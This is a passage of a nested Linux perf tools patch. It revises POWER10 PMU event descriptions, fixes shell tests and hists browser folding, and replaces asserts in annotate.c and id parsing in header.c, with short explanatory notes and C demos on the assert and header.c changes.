++    "BriefDescription": "The DPTEG required for the load/store instruction in execution was missing from the TLB. This event only counts for demand misses."
+   },
+   {
+     "EventCode": "0x4D02C",
+@@ -142,7 +142,7 @@
+   {
+     "EventCode": "0x4003E",
+     "EventName": "PM_LD_CMPL",
+-    "BriefDescription": "Loads completed."
++    "BriefDescription": "Load instruction completed."
+   },
+   {
+     "EventCode": "0x4C040",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/metrics.json b/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
+index b57526fa44f2d..6e76f65c314ce 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/metrics.json
+@@ -453,12 +453,6 @@
+         "MetricGroup": "General",
+         "MetricName": "LOADS_PER_INST"
+     },
+-    {
+-        "BriefDescription": "Average number of finished stores per completed instruction",
+-        "MetricExpr": "PM_ST_FIN / PM_RUN_INST_CMPL",
+-        "MetricGroup": "General",
+-        "MetricName": "STORES_PER_INST"
+-    },
+     {
+         "BriefDescription": "Percentage of demand loads that reloaded from beyond the L2 per completed instruction",
+         "MetricExpr": "PM_DATA_FROM_L2MISS / PM_RUN_INST_CMPL * 100",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/others.json b/tools/perf/pmu-events/arch/powerpc/power10/others.json
+index 7d0de1a2860b4..36c5bbc64c3be 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/others.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/others.json
+@@ -2,12 +2,12 @@
+   {
+     "EventCode": "0x10016",
+     "EventName": "PM_VSU0_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 0."
++    "BriefDescription": "VSU instruction issued to VSU pipe 0."
+   },
+   {
+     "EventCode": "0x1001C",
+     "EventName": "PM_ULTRAVISOR_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread was in ultravisor state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in ultravisor state."
+   },
+   {
+     "EventCode": "0x100F0",
+@@ -17,23 +17,18 @@
+   {
+     "EventCode": "0x10134",
+     "EventName": "PM_MRK_ST_DONE_L2",
+-    "BriefDescription": "Marked stores completed in L2 (RC machine done)."
++    "BriefDescription": "Marked store completed in L2."
+   },
+   {
+     "EventCode": "0x1505E",
+     "EventName": "PM_LD_HIT_L1",
+-    "BriefDescription": "Loads that finished without experiencing an L1 miss."
++    "BriefDescription": "Load finished without experiencing an L1 miss."
+   },
+   {
+     "EventCode": "0x1F056",
+     "EventName": "PM_DISP_SS0_2_INSTR_CYC",
+     "BriefDescription": "Cycles in which Superslice 0 dispatches either 1 or 2 instructions."
+   },
+-  {
+-    "EventCode": "0x1F15C",
+-    "EventName": "PM_MRK_STCX_L2_CYC",
+-    "BriefDescription": "Cycles spent in the nest portion of a marked Stcx instruction. It starts counting when the operation starts to drain to the L2 and it stops counting when the instruction retires from the Instruction Completion Table (ICT) in the Instruction Sequencing Unit (ISU)."
+-  },
+   {
+     "EventCode": "0x10066",
+     "EventName": "PM_ADJUNCT_CYC",
+@@ -42,7 +37,7 @@
+   {
+     "EventCode": "0x101E4",
+     "EventName": "PM_MRK_L1_ICACHE_MISS",
+-    "BriefDescription": "Marked Instruction suffered an icache Miss."
++    "BriefDescription": "Marked instruction suffered an instruction cache miss."
+   },
+   {
+     "EventCode": "0x101EA",
+@@ -72,7 +67,7 @@
+   {
+     "EventCode": "0x2E010",
+     "EventName": "PM_ADJUNCT_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread is in Adjunct state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in Adjunct state."
+   },
+   {
+     "EventCode": "0x2E014",
+@@ -122,7 +117,7 @@
+   {
+     "EventCode": "0x201E4",
+     "EventName": "PM_MRK_DATA_FROM_L3MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss for a marked load."
++    "BriefDescription": "The processor's L1 data cache was reloaded from beyond the local core's L3 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -132,17 +127,17 @@
+   {
+     "EventCode": "0x200F2",
+     "EventName": "PM_INST_DISP",
+-    "BriefDescription": "PowerPC instructions dispatched."
++    "BriefDescription": "PowerPC instruction dispatched."
+   },
+   {
+     "EventCode": "0x30132",
+     "EventName": "PM_MRK_VSU_FIN",
+-    "BriefDescription": "VSU marked instructions finished. Excludes simple FX instructions issued to the Store Unit."
++    "BriefDescription": "VSU marked instruction finished. Excludes simple FX instructions issued to the Store Unit."
+   },
+   {
+     "EventCode": "0x30038",
+     "EventName": "PM_EXEC_STALL_DMISS_LMEM",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for a load miss to resolve from the local memory, local OpenCapp cache, or local OpenCapp memory."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for a load miss to resolve from the local memory, local OpenCAPI cache, or local OpenCAPI memory."
+   },
+   {
+     "EventCode": "0x3F04A",
+@@ -152,12 +147,12 @@
+   {
+     "EventCode": "0x3405A",
+     "EventName": "PM_PRIVILEGED_INST_CMPL",
+-    "BriefDescription": "PowerPC Instructions that completed while the thread is in Privileged state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in Privileged state."
+   },
+   {
+     "EventCode": "0x3F150",
+     "EventName": "PM_MRK_ST_DRAIN_CYC",
+-    "BriefDescription": "cycles to drain st from core to L2."
++    "BriefDescription": "Cycles in which the marked store drained from the core to the L2."
+   },
+   {
+     "EventCode": "0x3F054",
+@@ -182,7 +177,7 @@
+   {
+     "EventCode": "0x4001C",
+     "EventName": "PM_VSU_FIN",
+-    "BriefDescription": "VSU instructions finished."
++    "BriefDescription": "VSU instruction finished."
+   },
+   {
+     "EventCode": "0x4C01A",
+@@ -197,7 +192,7 @@
+   {
+     "EventCode": "0x4D022",
+     "EventName": "PM_HYPERVISOR_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions that completed while the thread is in hypervisor state."
++    "BriefDescription": "PowerPC instruction completed while the thread was in hypervisor state."
+   },
+   {
+     "EventCode": "0x4D026",
+@@ -212,32 +207,32 @@
+   {
+     "EventCode": "0x40030",
+     "EventName": "PM_INST_FIN",
+-    "BriefDescription": "Instructions finished."
++    "BriefDescription": "Instruction finished."
+   },
+   {
+     "EventCode": "0x44146",
+     "EventName": "PM_MRK_STCX_CORE_CYC",
+-    "BriefDescription": "Cycles spent in the core portion of a marked Stcx instruction. It starts counting when the instruction is decoded and stops counting when it drains into the L2."
++    "BriefDescription": "Cycles spent in the core portion of a marked STCX instruction. It starts counting when the instruction is decoded and stops counting when it drains into the L2."
+   },
+   {
+     "EventCode": "0x44054",
+     "EventName": "PM_VECTOR_LD_CMPL",
+-    "BriefDescription": "Vector load instructions completed."
++    "BriefDescription": "Vector load instruction completed."
+   },
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "Two floating point instructions completed (FMA class of instructions: fmadd, fnmadd, fmsub, fnmsub). Scalar instructions only."
++    "BriefDescription": "Two floating point instruction completed (FMA class of instructions: fmadd, fnmadd, fmsub, fnmsub). Scalar instructions only."
+   },
+   {
+     "EventCode": "0x45056",
+     "EventName": "PM_SCALAR_FLOP_CMPL",
+-    "BriefDescription": "Scalar floating point instructions completed."
++    "BriefDescription": "Scalar floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4505C",
+     "EventName": "PM_MATH_FLOP_CMPL",
+-    "BriefDescription": "Math floating point instructions completed."
++    "BriefDescription": "Math floating point instruction completed."
+   },
+   {
+     "EventCode": "0x4D05E",
+@@ -252,21 +247,21 @@
+   {
+     "EventCode": "0x401E6",
+     "EventName": "PM_MRK_INST_FROM_L3MISS",
+-    "BriefDescription": "The processor's instruction cache was reloaded from a source other than the local core's L1, L2, or L3 due to a demand miss for a marked instruction."
++    "BriefDescription": "The processor's instruction cache was reloaded from beyond the local core's L3 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x401E8",
+     "EventName": "PM_MRK_DATA_FROM_L2MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1 or L2 due to a demand miss for a marked load."
++    "BriefDescription": "The processor's L1 data cache was reloaded from a source beyond the local core's L2 due to a demand miss for a marked instruction."
+   },
+   {
+     "EventCode": "0x400F0",
+     "EventName": "PM_LD_DEMAND_MISS_L1_FIN",
+-    "BriefDescription": "Load Missed L1, counted at finish time."
++    "BriefDescription": "Load missed L1, counted at finish time."
+   },
+   {
+     "EventCode": "0x400FA",
+     "EventName": "PM_RUN_INST_CMPL",
+-    "BriefDescription": "Completed PowerPC instructions gated by the run latch."
++    "BriefDescription": "PowerPC instruction completed while the run latch is set."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
+index b8aded6045faa..799893c56f32b 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/pipeline.json
+@@ -2,7 +2,7 @@
+   {
+     "EventCode": "0x100FE",
+     "EventName": "PM_INST_CMPL",
+-    "BriefDescription": "PowerPC instructions completed."
++    "BriefDescription": "PowerPC instruction completed."
+   },
+   {
+     "EventCode": "0x1000C",
+@@ -12,7 +12,7 @@
+   {
+     "EventCode": "0x1000E",
+     "EventName": "PM_MMA_ISSUED",
+-    "BriefDescription": "MMA instructions issued."
++    "BriefDescription": "MMA instruction issued."
+   },
+   {
+     "EventCode": "0x10012",
+@@ -107,7 +107,7 @@
+   {
+     "EventCode": "0x2D012",
+     "EventName": "PM_VSU1_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 1."
++    "BriefDescription": "VSU instruction issued to VSU pipe 1."
+   },
+   {
+     "EventCode": "0x2D018",
+@@ -122,7 +122,7 @@
+   {
+     "EventCode": "0x2E01E",
+     "EventName": "PM_EXEC_STALL_NTC_FLUSH",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was executing in any unit before it was flushed. Note that if the flush of the oldest instruction happens after finish, the cycles from dispatch to issue will be included in PM_DISP_STALL and the cycles from issue to finish will be included in PM_EXEC_STALL and its corresponding children. This event will also count cycles when the previous NTF instruction is still completing and the new NTF instruction is stalled at dispatch."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was executing in any unit before it was flushed. Note that if the flush of the oldest instruction happens after finish, the cycles from dispatch to issue will be included in PM_DISP_STALL and the cycles from issue to finish will be included in PM_EXEC_STALL and its corresponding children. This event will also count cycles when the previous next-to-finish (NTF) instruction is still completing and the new NTF instruction is stalled at dispatch."
+   },
+   {
+     "EventCode": "0x2013C",
+@@ -137,7 +137,7 @@
+   {
+     "EventCode": "0x201E2",
+     "EventName": "PM_MRK_LD_MISS_L1",
+-    "BriefDescription": "Marked DL1 Demand Miss counted at finish time."
++    "BriefDescription": "Marked demand data load miss counted at finish time."
+   },
+   {
+     "EventCode": "0x200F4",
+@@ -172,7 +172,7 @@
+   {
+     "EventCode": "0x30028",
+     "EventName": "PM_CMPL_STALL_MEM_ECC",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for the non-speculative finish of either a stcx waiting for its result or a load waiting for non-critical sectors of data and ECC."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline was waiting for the non-speculative finish of either a STCX waiting for its result or a load waiting for non-critical sectors of data and ECC."
+   },
+   {
+     "EventCode": "0x30036",
+@@ -187,17 +187,12 @@
+   {
+     "EventCode": "0x3F044",
+     "EventName": "PM_VSU2_ISSUE",
+-    "BriefDescription": "VSU instructions issued to VSU pipe 2."
++    "BriefDescription": "VSU instruction issued to VSU pipe 2."
+   },
+   {
+     "EventCode": "0x30058",
+     "EventName": "PM_TLBIE_FIN",
+-    "BriefDescription": "TLBIE instructions finished in the LSU. Two TLBIEs can finish each cycle. All will be counted."
+-  },
+-  {
+-    "EventCode": "0x3D058",
+-    "EventName": "PM_SCALAR_FSQRT_FDIV_ISSUE",
+-    "BriefDescription": "Scalar versions of four floating point operations: fdiv,fsqrt (xvdivdp, xvdivsp, xvsqrtdp, xvsqrtsp)."
++    "BriefDescription": "TLBIE instruction finished in the LSU. Two TLBIEs can finish each cycle. All will be counted."
+   },
+   {
+     "EventCode": "0x30066",
+@@ -252,7 +247,7 @@
+   {
+     "EventCode": "0x4E012",
+     "EventName": "PM_EXEC_STALL_UNKNOWN",
+-    "BriefDescription": "Cycles in which the oldest instruction in the pipeline completed without an ntf_type pulse. The ntf_pulse was missed by the ISU because the NTF finishes and completions came too close together."
++    "BriefDescription": "Cycles in which the oldest instruction in the pipeline completed without an ntf_type pulse. The ntf_pulse was missed by the ISU because the next-to-finish (NTF) instruction finishes and completions came too close together."
+   },
+   {
+     "EventCode": "0x4D020",
+@@ -267,12 +262,7 @@
+   {
+     "EventCode": "0x45058",
+     "EventName": "PM_IC_MISS_CMPL",
+-    "BriefDescription": "Non-speculative icache miss, counted at completion."
+-  },
+-  {
+-    "EventCode": "0x4D050",
+-    "EventName": "PM_VSU_NON_FLOP_CMPL",
+-    "BriefDescription": "Non-floating point VSU instructions completed."
++    "BriefDescription": "Non-speculative instruction cache miss, counted at completion."
+   },
+   {
+     "EventCode": "0x4D052",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/pmc.json b/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
+index b5d1bd39cfb22..364fedbfb490b 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/pmc.json
+@@ -12,11 +12,11 @@
+   {
+     "EventCode": "0x45052",
+     "EventName": "PM_4FLOP_CMPL",
+-    "BriefDescription": "Four floating point instructions completed (fadd, fmul, fsub, fcmp, fsel, fabs, fnabs, fres, fsqrte, fneg)."
++    "BriefDescription": "Four floating point instruction completed (fadd, fmul, fsub, fcmp, fsel, fabs, fnabs, fres, fsqrte, fneg)."
+   },
+   {
+     "EventCode": "0x4D054",
+     "EventName": "PM_8FLOP_CMPL",
+-    "BriefDescription": "Four Double Precision vector instructions completed."
++    "BriefDescription": "Four Double Precision vector instruction completed."
+   }
+ ]
+diff --git a/tools/perf/pmu-events/arch/powerpc/power10/translation.json b/tools/perf/pmu-events/arch/powerpc/power10/translation.json
+index db3766dca07c5..961e2491e73f6 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power10/translation.json
++++ b/tools/perf/pmu-events/arch/powerpc/power10/translation.json
+@@ -4,11 +4,6 @@
+     "EventName": "PM_MRK_START_PROBE_NOP_CMPL",
+     "BriefDescription": "Marked Start probe nop (AND R0,R0,R0) completed."
+   },
+-  {
+-    "EventCode": "0x20016",
+-    "EventName": "PM_ST_FIN",
+-    "BriefDescription": "Store finish count. Includes speculative activity."
+-  },
+   {
+     "EventCode": "0x20018",
+     "EventName": "PM_ST_FWD",
+@@ -17,7 +12,7 @@
+   {
+     "EventCode": "0x2011C",
+     "EventName": "PM_MRK_NTF_CYC",
+-    "BriefDescription": "Cycles during which the marked instruction is the oldest in the pipeline (NTF or NTC)."
++    "BriefDescription": "Cycles in which the marked instruction is the oldest in the pipeline (next-to-finish or next-to-complete)."
+   },
+   {
+     "EventCode": "0x2E01C",
+@@ -37,7 +32,7 @@
+   {
+     "EventCode": "0x200FE",
+     "EventName": "PM_DATA_FROM_L2MISS",
+-    "BriefDescription": "The processor's data cache was reloaded from a source other than the local core's L1 or L2 due to a demand miss."
++    "BriefDescription": "The processor's L1 data cache was reloaded from a source beyond the local core's L2 due to a demand miss."
+   },
+   {
+     "EventCode": "0x30010",
+@@ -52,6 +47,6 @@
+   {
+     "EventCode": "0x4D05C",
+     "EventName": "PM_DPP_FLOP_CMPL",
+-    "BriefDescription": "Double-Precision or Quad-Precision instructions completed."
++    "BriefDescription": "Double-Precision or Quad-Precision instruction completed."
+   }
+ ]
+diff --git a/tools/perf/tests/shell/stat_bpf_counters.sh b/tools/perf/tests/shell/stat_bpf_counters.sh
+index 13473aeba489c..6bf24b85294c7 100755
+--- a/tools/perf/tests/shell/stat_bpf_counters.sh
++++ b/tools/perf/tests/shell/stat_bpf_counters.sh
+@@ -22,10 +22,10 @@ compare_number()
+ }
+ 
+ # skip if --bpf-counters is not supported
+-if ! perf stat --bpf-counters true > /dev/null 2>&1; then
++if ! perf stat -e cycles --bpf-counters true > /dev/null 2>&1; then
+ 	if [ "$1" = "-v" ]; then
+ 		echo "Skipping: --bpf-counters not supported"
+-		perf --no-pager stat --bpf-counters true || true
++		perf --no-pager stat -e cycles --bpf-counters true || true
+ 	fi
+ 	exit 2
+ fi
+diff --git a/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh b/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
+index d724855d097c2..e75d0780dc788 100755
+--- a/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
++++ b/tools/perf/tests/shell/stat_bpf_counters_cgrp.sh
+@@ -25,22 +25,22 @@ check_bpf_counter()
+ find_cgroups()
+ {
+ 	# try usual systemd slices first
+-	if [ -d /sys/fs/cgroup/system.slice -a -d /sys/fs/cgroup/user.slice ]; then
++	if [ -d /sys/fs/cgroup/system.slice ] && [ -d /sys/fs/cgroup/user.slice ]; then
+ 		test_cgroups="system.slice,user.slice"
+ 		return
+ 	fi
+ 
+ 	# try root and self cgroups
+-	local self_cgrp=$(grep perf_event /proc/self/cgroup | cut -d: -f3)
+-	if [ -z ${self_cgrp} ]; then
++	find_cgroups_self_cgrp=$(grep perf_event /proc/self/cgroup | cut -d: -f3)
++	if [ -z ${find_cgroups_self_cgrp} ]; then
+ 		# cgroup v2 doesn't specify perf_event
+-		self_cgrp=$(grep ^0: /proc/self/cgroup | cut -d: -f3)
++		find_cgroups_self_cgrp=$(grep ^0: /proc/self/cgroup | cut -d: -f3)
+ 	fi
+ 
+-	if [ -z ${self_cgrp} ]; then
++	if [ -z ${find_cgroups_self_cgrp} ]; then
+ 		test_cgroups="/"
+ 	else
+-		test_cgroups="/,${self_cgrp}"
++		test_cgroups="/,${find_cgroups_self_cgrp}"
+ 	fi
+ }
+ 
+@@ -48,13 +48,11 @@ find_cgroups()
+ # Just check if it runs without failure and has non-zero results.
+ check_system_wide_counted()
+ {
+-	local output
+-
+-	output=$(perf stat -a --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, sleep 1  2>&1)
+-	if echo ${output} | grep -q -F "<not "; then
++	check_system_wide_counted_output=$(perf stat -a --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, sleep 1  2>&1)
++	if echo ${check_system_wide_counted_output} | grep -q -F "<not "; then
+ 		echo "Some system-wide events are not counted"
+ 		if [ "${verbose}" = "1" ]; then
+-			echo ${output}
++			echo ${check_system_wide_counted_output}
+ 		fi
+ 		exit 1
+ 	fi
+@@ -62,13 +60,11 @@ check_system_wide_counted()
+ 
+ check_cpu_list_counted()
+ {
+-	local output
+-
+-	output=$(perf stat -C 1 --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, taskset -c 1 sleep 1  2>&1)
+-	if echo ${output} | grep -q -F "<not "; then
++	check_cpu_list_counted_output=$(perf stat -C 0,1 --bpf-counters --for-each-cgroup ${test_cgroups} -e cpu-clock -x, taskset -c 1 sleep 1  2>&1)
++	if echo ${check_cpu_list_counted_output} | grep -q -F "<not "; then
+ 		echo "Some CPU events are not counted"
+ 		if [ "${verbose}" = "1" ]; then
+-			echo ${output}
++			echo ${check_cpu_list_counted_output}
+ 		fi
+ 		exit 1
+ 	fi
+diff --git a/tools/perf/ui/browsers/hists.c b/tools/perf/ui/browsers/hists.c
+index b72ee68222228..fd3e67d2c6bdd 100644
+--- a/tools/perf/ui/browsers/hists.c
++++ b/tools/perf/ui/browsers/hists.c
+@@ -407,11 +407,6 @@ static bool hist_browser__selection_has_children(struct hist_browser *browser)
+ 	return container_of(ms, struct callchain_list, ms)->has_children;
+ }
+ 
+-static bool hist_browser__he_selection_unfolded(struct hist_browser *browser)
+-{
+-	return browser->he_selection ? browser->he_selection->unfolded : false;
+-}
+-
+ static bool hist_browser__selection_unfolded(struct hist_browser *browser)
+ {
+ 	struct hist_entry *he = browser->he_selection;
+@@ -584,8 +579,8 @@ static int hierarchy_set_folding(struct hist_browser *hb, struct hist_entry *he,
+ 	return n;
+ }
+ 
+-static void __hist_entry__set_folding(struct hist_entry *he,
+-				      struct hist_browser *hb, bool unfold)
++static void hist_entry__set_folding(struct hist_entry *he,
++				    struct hist_browser *hb, bool unfold)
+ {
+ 	hist_entry__init_have_children(he);
+ 	he->unfolded = unfold ? he->has_children : false;
+@@ -603,34 +598,12 @@ static void __hist_entry__set_folding(struct hist_entry *he,
+ 		he->nr_rows = 0;
+ }
+ 
+-static void hist_entry__set_folding(struct hist_entry *he,
+-				    struct hist_browser *browser, bool unfold)
+-{
+-	double percent;
+-
+-	percent = hist_entry__get_percent_limit(he);
+-	if (he->filtered || percent < browser->min_pcnt)
+-		return;
+-
+-	__hist_entry__set_folding(he, browser, unfold);
+-
+-	if (!he->depth || unfold)
+-		browser->nr_hierarchy_entries++;
+-	if (he->leaf)
+-		browser->nr_callchain_rows += he->nr_rows;
+-	else if (unfold && !hist_entry__has_hierarchy_children(he, browser->min_pcnt)) {
+-		browser->nr_hierarchy_entries++;
+-		he->has_no_entry = true;
+-		he->nr_rows = 1;
+-	} else
+-		he->has_no_entry = false;
+-}
+-
+ static void
+ __hist_browser__set_folding(struct hist_browser *browser, bool unfold)
+ {
+ 	struct rb_node *nd;
+ 	struct hist_entry *he;
++	double percent;
+ 
+ 	nd = rb_first_cached(&browser->hists->entries);
+ 	while (nd) {
+@@ -640,6 +613,21 @@ __hist_browser__set_folding(struct hist_browser *browser, bool unfold)
+ 		nd = __rb_hierarchy_next(nd, HMD_FORCE_CHILD);
+ 
+ 		hist_entry__set_folding(he, browser, unfold);
++
++		percent = hist_entry__get_percent_limit(he);
++		if (he->filtered || percent < browser->min_pcnt)
++			continue;
++
++		if (!he->depth || unfold)
++			browser->nr_hierarchy_entries++;
++		if (he->leaf)
++			browser->nr_callchain_rows += he->nr_rows;
++		else if (unfold && !hist_entry__has_hierarchy_children(he, browser->min_pcnt)) {
++			browser->nr_hierarchy_entries++;
++			he->has_no_entry = true;
++			he->nr_rows = 1;
++		} else
++			he->has_no_entry = false;
+ 	}
+ }
+ 
+@@ -659,8 +647,10 @@ static void hist_browser__set_folding_selected(struct hist_browser *browser, boo
+ 	if (!browser->he_selection)
+ 		return;
+ 
+-	hist_entry__set_folding(browser->he_selection, browser, unfold);
+-	browser->b.nr_entries = hist_browser__nr_entries(browser);
++	if (unfold == browser->he_selection->unfolded)
++		return;
++
++	hist_browser__toggle_fold(browser);
+ }
+ 
+ static void ui_browser__warn_lost_events(struct ui_browser *browser)
+@@ -732,8 +722,8 @@ static int hist_browser__handle_hotkey(struct hist_browser *browser, bool warn_l
+ 		hist_browser__set_folding(browser, true);
+ 		break;
+ 	case 'e':
+-		/* Expand the selected entry. */
+-		hist_browser__set_folding_selected(browser, !hist_browser__he_selection_unfolded(browser));
++		/* Toggle expand/collapse the selected entry. */
++		hist_browser__toggle_fold(browser);
+ 		break;
+ 	case 'H':
+ 		browser->show_headers = !browser->show_headers;
+@@ -1779,7 +1769,7 @@ static void hists_browser__hierarchy_headers(struct hist_browser *browser)
+ 	hists_browser__scnprintf_hierarchy_headers(browser, headers,
+ 						   sizeof(headers));
+ 
+-	ui_browser__gotorc(&browser->b, 0, 0);
++	ui_browser__gotorc_title(&browser->b, 0, 0);
+ 	ui_browser__set_color(&browser->b, HE_COLORSET_ROOT);
+ 	ui_browser__write_nstring(&browser->b, headers, browser->b.width + 1);
+ }
+diff --git a/tools/perf/util/annotate.c b/tools/perf/util/annotate.c
+index db475e44f42fa..a9122ea3b44c4 100644
+--- a/tools/perf/util/annotate.c
++++ b/tools/perf/util/annotate.c
+@@ -1756,8 +1756,11 @@ static int symbol__disassemble_bpf(struct symbol *sym,
+ 	perf_exe(tpath, sizeof(tpath));
+ 
+ 	bfdf = bfd_openr(tpath, NULL);
+-	assert(bfdf);
+-	assert(bfd_check_format(bfdf, bfd_object));
++	if (bfdf == NULL)
++		abort();
++
++	if (!bfd_check_format(bfdf, bfd_object))
++		abort();
+ 
+ 	s = open_memstream(&buf, &buf_size);
+ 	if (!s) {
+@@ -1805,7 +1808,8 @@ static int symbol__disassemble_bpf(struct symbol *sym,
+ #else
+ 	disassemble = disassembler(bfdf);
+ #endif
+-	assert(disassemble);
++	if (disassemble == NULL)
++		abort();
+ 
+ 	fflush(s);
+ 	do {
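assert() compiles to nothing when NDEBUG is defined, which is typical for release builds, so the disassembler setup in annotate.c lost its guards entirely in those builds; the explicit NULL checks plus abort() keep the failure deterministic everywhere. A small demonstration (build with and without -DNDEBUG to see the difference):

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

static void *open_handle(void) { return NULL; /* simulate failure */ }

int main(void)
{
	void *h = open_handle();

	/* Vanishes under -DNDEBUG: h would stay NULL and be used anyway. */
	assert(h != NULL);

	/* Survives every build configuration. */
	if (h == NULL)
		abort();

	printf("handle: %p\n", h);
	return 0;
}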
+diff --git a/tools/perf/util/header.c b/tools/perf/util/header.c
+index 98dfaf84bd137..9e2dce70b1300 100644
+--- a/tools/perf/util/header.c
++++ b/tools/perf/util/header.c
+@@ -4331,7 +4331,8 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 			     union perf_event *event,
+ 			     struct evlist **pevlist)
+ {
+-	u32 i, ids, n_ids;
++	u32 i, n_ids;
++	u64 *ids;
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = *pevlist;
+ 
+@@ -4347,9 +4348,8 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 
+ 	evlist__add(evlist, evsel);
+ 
+-	ids = event->header.size;
+-	ids -= (void *)&event->attr.id - (void *)event;
+-	n_ids = ids / sizeof(u64);
++	n_ids = event->header.size - sizeof(event->header) - event->attr.attr.size;
++	n_ids = n_ids / sizeof(u64);
+ 	/*
+ 	 * We don't have the cpu and thread maps on the header, so
+ 	 * for allocating the perf_sample_id table we fake 1 cpu and
+@@ -4358,8 +4358,9 @@ int perf_event__process_attr(struct perf_tool *tool __maybe_unused,
+ 	if (perf_evsel__alloc_id(&evsel->core, 1, n_ids))
+ 		return -ENOMEM;
+ 
++	ids = (void *)&event->attr.attr + event->attr.attr.size;
+ 	for (i = 0; i < n_ids; i++) {
+-		perf_evlist__id_add(&evlist->core, &evsel->core, 0, i, event->attr.id[i]);
++		perf_evlist__id_add(&evlist->core, &evsel->core, 0, i, ids[i]);
+ 	}
+ 
+ 	return 0;
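The header.c fix stops assuming the id array sits at the fixed struct offset &event->attr.id and instead derives both the count and the start of the trailing u64 ids from the record's self-describing sizes: header.size minus the header minus attr.attr.size. Parsing such a variable-size record looks like this (sketch with a deliberately simplified layout):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct hdr  { uint16_t size; };           /* total record size in bytes */
struct attr { uint32_t size; };           /* self-describing attr size  */

int main(void)
{
	/* record = hdr | attr (attr.size bytes on the wire) | n_ids * u64 */
	unsigned char rec[sizeof(struct hdr) + 8 + 2 * sizeof(uint64_t)];
	struct hdr h = { sizeof(rec) };
	struct attr a = { 8 };                /* wire size exceeds the struct */
	uint64_t ids[2] = { 100, 101 };

	memcpy(rec, &h, sizeof(h));
	memcpy(rec + sizeof(h), &a, sizeof(a));
	memcpy(rec + sizeof(h) + a.size, ids, sizeof(ids));

	uint32_t n_ids = (h.size - sizeof(h) - a.size) / sizeof(uint64_t);

	for (uint32_t i = 0; i < n_ids; i++) {
		uint64_t id;

		memcpy(&id, rec + sizeof(h) + a.size + i * sizeof(id), sizeof(id));
		printf("id[%u] = %llu\n", i, (unsigned long long)id);
	}
	return 0;
}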
+diff --git a/tools/testing/selftests/kselftest/runner.sh b/tools/testing/selftests/kselftest/runner.sh
+index 294619ade49fe..1333ab1eda708 100644
+--- a/tools/testing/selftests/kselftest/runner.sh
++++ b/tools/testing/selftests/kselftest/runner.sh
+@@ -35,7 +35,8 @@ tap_timeout()
+ {
+ 	# Make sure tests will time out if utility is available.
+ 	if [ -x /usr/bin/timeout ] ; then
+-		/usr/bin/timeout --foreground "$kselftest_timeout" $1
++		/usr/bin/timeout --foreground "$kselftest_timeout" \
++			/usr/bin/timeout "$kselftest_timeout" $1
+ 	else
+ 		$1
+ 	fi
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index 05400462c7799..aa646e0661f36 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -72,7 +72,7 @@ endef
+ run_tests: all
+ ifdef building_out_of_srctree
+ 	@if [ "X$(TEST_PROGS)$(TEST_PROGS_EXTENDED)$(TEST_FILES)" != "X" ]; then \
+-		rsync -aLq $(TEST_PROGS) $(TEST_PROGS_EXTENDED) $(TEST_FILES) $(OUTPUT); \
++		rsync -aq --copy-unsafe-links $(TEST_PROGS) $(TEST_PROGS_EXTENDED) $(TEST_FILES) $(OUTPUT); \
+ 	fi
+ 	@if [ "X$(TEST_PROGS)" != "X" ]; then \
+ 		$(call RUN_TESTS, $(TEST_GEN_PROGS) $(TEST_CUSTOM_PROGS) \
+@@ -86,7 +86,7 @@ endif
+ 
+ define INSTALL_SINGLE_RULE
+ 	$(if $(INSTALL_LIST),@mkdir -p $(INSTALL_PATH))
+-	$(if $(INSTALL_LIST),rsync -aL $(INSTALL_LIST) $(INSTALL_PATH)/)
